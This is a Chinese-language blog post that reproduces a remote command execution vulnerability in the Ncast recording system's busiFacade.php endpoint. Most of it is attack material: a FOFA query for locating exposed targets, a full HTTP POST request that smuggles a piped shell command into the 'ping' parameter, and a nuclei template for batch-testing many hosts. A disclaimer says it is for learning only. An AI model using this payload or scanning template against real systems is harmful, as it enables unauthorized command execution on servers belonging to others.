免责声明:

本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!

漏洞描述

Ncast盈可视高清智能录播系统是一套新进的音视频录制和播放系统,旨在提供高质量,高清定制的录播功能。该系统/classes/common/busiFacade.php接口存在RCE漏洞,攻击者可以构造恶意命令远控服务器。

fofa语句

app="Ncast-产品" && title=="高清智能录播系统"

漏洞复现

打开页面

1705981036787.png

构造payload

1705978428723.png

POST /classes/common/busiFacade.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 152
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

nuclei批量验证

1705981000010.png


id: Ncat-RCE-CVE-2024-0305

info:
  name: Ncast盈可视高清智能录播系统busiFacade RCE漏洞
  author: fgz
  severity: critical
  description: Ncast盈可视高清智能录播系统是一套新进的音视频录制和播放系统。该系统/classes/common/busiFacade.php接口存在RCE漏洞。
  metadata:
    max-request: 1
    fofa-query: app="Ncast-产品" && title=="高清智能录播系统"
    verified: true
http:
  - raw:
      - |-
        POST /classes/common/busiFacade.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
        Connection: close
        Content-Length: 91
        Accept: */*
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest

        {"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["| echo hello"]}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - hello
      - type: status
        status:
          - 200

github poc总汇地址:https://github.com/AYcg/poc